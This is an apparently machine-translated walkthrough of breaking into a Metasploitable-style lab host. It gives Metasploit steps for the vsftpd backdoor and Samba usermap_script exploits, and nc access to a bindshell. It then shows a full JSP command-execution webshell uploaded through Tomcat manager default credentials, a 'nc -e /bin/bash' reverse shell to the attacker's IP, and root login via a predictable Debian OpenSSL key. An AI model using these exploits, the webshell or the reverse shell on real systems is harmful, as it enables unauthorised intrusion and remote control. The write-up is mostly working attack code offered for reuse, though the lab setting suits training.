1. Information collection
nmap scan
Access port 80
2. Vulnerability Exploitation
1. Vulnerability 1
1.vsftpd 2.3.4 (CVE-2011-2523)
2.msf
msf6 > search vsftpd msf6 > use 0 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.103.189 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
2. Vulnerability 2
samba 3.x
Suspiciously, I saw that the samba service is open, the version is: samba 3.x
If you are suspicious, search the Internet for the payload used by this samba 3.x version msf
Commands used by msf:
search samba 3.x use exploit/multi/samba/usermap_script show payloads set payload cmd/unix/reverse show options set RHOSTS target machine IP run
Enter the shell directly with root permissions
4. Vulnerability three
DVWA shooting range
Default account password:
Account:admin Password: password
5. Vulnerability 4
Backdoor backdoor
┌──(rootkali)-[~/Desktop] └─# nc 192.168.103.189 1524
6. Vulnerability 5
apache tomcat
1. Access Port 80
The first website you check is port 80
Check tomcat under port 8180
2.tomcat vulnerability
Use the tomcat file upload vulnerability, click tomcat manager
Account: tomcat Password: tomcat
There is an upload point for file upload
3. Upload the war package
jsp’s echoable horse, package it into a war and upload it
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
“);
}
%>
//jar -cvf packaged war package name jsp echoable horse jar -cvf tomcats.war tomcat.jsp
Then we visit: url:8180/war package name/jsp Trojan full name http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123 &cmd=id
It is found that the permissions displayed are not high
4.Rebound shell
┌──(rootkali)-[~/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123 & cmd=nc -e /bin/bash 192.168.103.129 4444
url encoding:
http://192.168.103.187:8180/tomcats/tomcat.jsp?pwd=123 & cmd=nc -e /bin/bash 192.168.103.129 4444
python -c 'import pty; pty.spawn ("/bin/bash")' #Interactive shell
Check the kernel version uname -a
5.ssh public key file
Finally a public key file was found in the /root/.ssh directory This can also be used in lower versions
Because the version here is lower, and it is speculated that there is a pseudo-random number leak in the openssl software package, download that package here. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
.tar.bz2 Unzip: tar jxvf FileName.tar.bz2 Compression: tar jcvf FileName.tar.bz2 DirName tar jxvf 5622.tar.bz2
Then go to the /rsa/2048 directory
grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh + WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXX vSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U + qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE + kcP + Jz2mt4y1 uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc + Wv8Vw7bwkf + 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable *.pub //Find using command 57c3115d77c56390332dc5c49978627a-5429
6.root permission
Then we can log in directly through the private key, and then we can log in directly as root
┌──(rootkali)-[~/routing/rsa/2048] └─# ssh [email protected] -i 57c3115d77c56390332dc5c49978627a-5429
The knowledge points of the article match the official knowledge files, and you can further learn relevant knowledge. CS entry skill treeLinux introductionFirst introduction to Linux 37719 people are learning the system